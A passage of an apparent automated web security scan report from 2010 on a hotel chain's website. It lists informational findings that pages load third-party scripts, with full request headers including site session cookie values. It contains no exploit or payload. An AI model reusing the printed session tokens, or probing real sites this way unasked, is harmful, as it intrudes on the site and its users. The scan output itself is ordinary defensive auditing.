Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:36:03 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:36:03 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>This Week in London Podcasts -
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.77. http://www.redcarnationhotels.com/press-room/rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/rss

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /press-room/rss HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/press-room
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:35:30 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:35:30 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Red Carnation Hotels RSS Press
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.78. http://www.redcarnationhotels.com/promoza  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /promoza

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /promoza HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/our-hotels
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:45:24 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:45:24 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Hotels South Africa | Bo
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.79. http://www.redcarnationhotels.com/refer-a-friend  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /refer-a-friend

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /refer-a-friend HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:23 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=b215cb8e38815bbbb9fba59d31514955; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Send to a Friend</title>
<met
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.80. http://www.redcarnationhotels.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:17 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=94bca35a4d7c66899e27a596387efe0d; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Search - Red Carnation Hotels</
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.81. http://www.redcarnationhotels.com/side-images  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /side-images

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /side-images HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Side Images</title>
<meta http-
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.82. http://www.redcarnationhotels.com/site-map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /site-map

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /site-map HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:31 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:31 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=bc0e91c340b0c8c5f0de0f9133eec66b; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Site Map</title>
<meta http-equ
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.83. http://www.redcarnationhotels.com/special-occasions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /special-occasions HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:31:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:31:10 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=064d44ec42ae0320af68f09cef0becea; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Weddings, Honeymoons, Christmas
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.84. http://www.redcarnationhotels.com/special-occasions/celebrations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/celebrations

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /special-occasions/celebrations HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:54:40 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:40 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Private parties and celebration
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.85. http://www.redcarnationhotels.com/special-occasions/escapes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/escapes

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /special-occasions/escapes HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:54:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:45 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Escapes - Red Carnation Hotels<
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.86. http://www.redcarnationhotels.com/special-occasions/tell-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/tell-us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /special-occasions/tell-us HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:55:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:55:13 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Tell Us - Special Occasions - R
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.87. http://www.redcarnationhotels.com/special-occasions/weddings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/weddings

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /special-occasions/weddings HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:54:53 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:53 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Wedding Venues, Honeymoo
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.88. http://www.redcarnationhotels.com/test_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /test_1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /test_1 HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:01:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:01:36 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>test</title>
<meta http-equiv="
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.89. http://www.redcarnationhotels.com/travel-agents  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /travel-agents HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:25:05 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:25:05 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=8ed7ac330ba840ea6828a58e485783b4; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Travel Agents Booking Area ...
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.90. http://www.redcarnationhotels.com/travel-agents/agents-commissions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents/agents-commissions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /travel-agents/agents-commissions HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:58 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Red Carnation Hotels, Agents Co
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.91. http://www.redcarnationhotels.com/travel-agents/sales-representatives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents/sales-representatives

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /travel-agents/sales-representatives HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:35 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Sales Representatives, Red Carn
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.92. http://www.redcarnationhotels.com/travel-agents/trade-shows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents/trade-shows

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /travel-agents/trade-shows HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:58 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Travel Agents, Trade Shows, Red
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.93. http://www.redcarnationhotels.com/useful-links  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /useful-links

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /useful-links HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:33 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=fa8e88b1ec9853100dafa585ebdfc757; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
